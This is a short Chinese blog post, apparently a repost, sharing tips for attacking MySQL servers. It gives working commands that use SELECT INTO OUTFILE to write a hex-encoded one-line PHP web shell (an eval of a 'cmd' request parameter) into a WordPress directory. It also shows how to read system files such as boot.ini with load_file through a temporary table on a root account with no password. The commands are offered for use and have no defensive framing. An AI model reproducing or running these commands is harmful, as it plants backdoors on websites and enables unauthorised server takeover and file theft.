最新消息:

数据库outfile写shell与load1_file的一点心得

wordpress admin 1671浏览 0评论

一点心得:
昨天在一个mysql数据库的console里面直接导出一句话的时候

用这种网上说的直接写出不成功

1 select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'e://appserv//www//91ri.org //modules//wordpress//app.php';

ps:密码是cmd

还是老老实实建表再写 :

1 select code from text into outfile 'e://appserv//www//91ri.org //modules//wordpress//app.php';

ps:密码是cmd

而且对于windows一定得用上面这样的形式的绝对路径
网上的大部分都是说的linux下的

=========================================
刚碰到一个root空口令的MySql,进phpMyAdmin,outfile成功,但是无法load1_file。如下解决:
建表:
create table test (a text);
insert into test (a) values (load1_file(‘c:boot.ini’));
select * from test;
成功解决。

 

link:http://nana.blackbap.org/?p=archive&id=21

ps:展示一下效果:

20130628231935

20130628231950

转载请注明:jinglingshu的博客 » 数据库outfile写shell与load1_file的一点心得

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址